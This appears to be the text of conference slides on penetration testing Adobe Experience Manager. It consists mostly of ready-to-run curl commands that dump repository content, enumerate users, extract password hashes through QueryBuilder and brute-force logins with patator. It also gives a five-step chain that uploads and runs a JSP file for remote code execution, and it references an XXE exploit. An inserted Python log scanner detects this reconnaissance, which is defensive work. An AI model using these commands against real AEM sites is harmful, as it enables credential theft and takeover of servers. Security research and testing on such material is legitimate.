
Hack1ng Adobe Experience Manager sites

Who is that guy?


Mikhail Egorov
Security researcher
Works in Odin (Parallels)
0ang3el (at) gma1l (d0t) com

Related Work
http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/
http://www.slideshare.net/CQCON/prsentation-ben-zahler
https://docs.adobe.com/docs/en/aem/6-0/administer/security/securitychecklist.html

What do we want
Sensitive information from JCR
Installed OSGI bundles
Custom scripts
Usernames
Password hashes
Elements that allow anonymous modification

Sensitive information from JCR

Use JsonRendererServlet
curl -X GET http://127.0.0.1:8080/.json
curl -X GET http://127.0.0.1:8080/.6.json
curl -X GET http://127.0.0.1:8080/.tidy.6.json
curl -X GET http://127.0.0.1:8080/.tidy.infinity.json

Installed OSGI bundles

List of all bundles
curl -X GET http://127.0.0.1:8080/bin.tidy.infinity.json

QueryBuilder is your friend!
http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html
curl -X GET http://127.0.0.1:8080/bin/querybuilder.json

Custom scripts

List custom scripts
curl -X GET http://127.0.0.1:8080/apps.tidy.infinity.json

List compiled custom scripts from the cache
curl -X GET http://127.0.0.1:8080/var/classes.tidy.infinity.json

Usernames

Dump content node properties
curl -X GET http://127.0.0.1:8080/content.infinity.json

Use a regular expression to extract usernames (pipe with the previous command)
python -c 'import sys,re; print("\n".join(m.group(1) for m in re.finditer("\".+?By\":\"(.+?)\"", sys.stdin.read())))' | sort -u

Password hashes

Use the QueryBuilder bundle (the URL is quoted so the shell does not interpret the & characters)
curl -X GET 'http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName%20rep:password&p.limit=100'

Anonymous modification

Dump content node properties
curl -X GET http://127.0.0.1:8080/content.infinity.json

Use a regular expression to check (pipe with the previous command)
python -c 'import sys,re; m = re.search("\".+?By\":\"anonymous\"", sys.stdin.read()); print("Anon modification: " + ("Yes" if m else "No"))'
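Every request used in the enumeration above (the root and depth-selector JSON dumps of /, /bin, /apps, /var/classes and /content, and the QueryBuilder call asking for rep:password) leaves a recognisable trail in the publish or dispatcher access log. The following example is added here and is not part of the original talk: it classifies constructed combined-format access-log lines (the log layout, addresses and timestamps are assumptions) so a defender can spot this reconnaissance and see whether it succeeded without authentication.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format; layout, addresses and timestamps are assumptions).
SAMPLE_LOG = """\
10.0.0.5 - - [03/May/2015:21:24:38 +0300] "GET /.tidy.infinity.json HTTP/1.1" 200 51200
10.0.0.5 - - [03/May/2015:21:24:40 +0300] "GET /bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName%20rep:password&p.limit=100 HTTP/1.1" 200 3300
10.0.0.5 - - [03/May/2015:21:24:45 +0300] "GET /var/classes.tidy.infinity.json HTTP/1.1" 200 9000
10.0.0.9 - author [03/May/2015:21:26:12 +0300] "GET /content/site/en.json HTTP/1.1" 200 400
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# Repository roots whose recursive JSON dump exposes bundles, scripts or content metadata.
SENSITIVE_ROOTS = {"/", "/bin", "/apps", "/var/classes", "/content"}


def dump_scope(path):
    """Return the root a Sling JSON-renderer request dumps, or None if the request is harmless."""
    if not path.endswith(".json"):
        return None
    base, _, selectors = path.partition(".")  # "/apps.tidy.infinity.json" -> "/apps", "tidy.infinity.json"
    base = base or "/"                        # "/.tidy.infinity.json" dumps the repository root
    depth = selectors.split(".")[:-1]         # selectors in front of the "json" extension
    deep = any(s == "infinity" or s.isdigit() for s in depth)
    return base if base in SENSITIVE_ROOTS and (deep or base == "/") else None


def classify(line):
    """Return the list of findings for one log line ([] when nothing is suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    query = parse_qs(url.query)
    findings = []
    if scope := dump_scope(url.path):
        findings.append("jcr-dump:" + scope)
    if url.path.startswith("/bin/querybuilder.json"):
        props = " ".join(query.get("p.properties", []))  # parse_qs already decodes %20
        if "rep:password" in props or "rep:User" in query.get("type", []):
            findings.append("querybuilder-user-enum")
    # A 200 with no authenticated user means the endpoint is reachable anonymously.
    if findings and m["user"] == "-" and m["status"] == "200":
        findings.append("anonymous")
    return findings


def scan(log_text):
    """Return (client ip, findings) for every line that triggered at least one finding."""
    return [(ln.split(" ", 1)[0], f) for ln in log_text.splitlines() if (f := classify(ln))]
```

Any "anonymous" finding on a production publish instance means the dispatcher filter or the anonymous ACLs do not block the renderer or QueryBuilder, which is exactly what the checks above are exploiting.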

Getting access

Try default user credentials: admin/admin, author/author, anonymous/anonymous
Offline attack (brute-force the hashes)
Online attack (POST servlet bundle)
patator http_fuzz url=http://127.0.0.1:8080/content/fake.json method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt auth_type=basic -x ignore:code!=200 --threads 5

You have access, now what?


XSS
Not covered, sorry!
CSRF
DoS
Read local files
RCE

Webdav bundle, XXE

CVE-2015-1833 ( http://seclists.org/oss-sec/2015/q2/518 )
The WebDAV OSGi bundle uses an XML parser that is not properly initialized
Exploit - https://www.exploit-db.com/exploits/37110/

Out-of-band exploitation
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
Pros: works with anonymous credentials
Cons: you need an external server, unstable

Inbound exploitation
Pros: you do not need an external server, more stable
Cons: you need the credentials of a user who is able to modify some node in the JCR

Webdav bundle, XXE Demo

http://www.youtube.com/watch?v=Hg3AXoG89Gs

Remote code execution

We have node http://127.0.0.1:8080/rce
{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}

We have script exec.jsp that is magically loaded into node http://127.0.0.1:8080/apps/rcetype
{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}

When someone navigates to http://127.0.0.1:8080/rce.exec our exec.jsp will be executed.

Remote code execution

Step I: Create rcetype node
curl -u admin:admin -F jcr:primaryType=nt:folder http://127.0.0.1:8080/content/rcetype

Step II: Upload script exec.jsp to rcetype node
curl -u admin:admin -F exec.jsp=@RCE.jsp http://127.0.0.1:8080/content/rcetype

Step III: Copy rcetype to /apps
curl -u admin:admin -F :operation=copy -F :dest=/apps/rcetype http://127.0.0.1:8080/content/rcetype

Step IV: Create rce node bound to rcetype
curl -u admin:admin -F sling:resourceType=rcetype http://127.0.0.1:8080/content/rce

Step V: Launch the JSP script
curl -X GET http://127.0.0.1:8080/content/rce.exec

Remote code execution, Demo

http://www.youtube.com/watch?v=Z9n2T07e6Ls

Ask a Ninja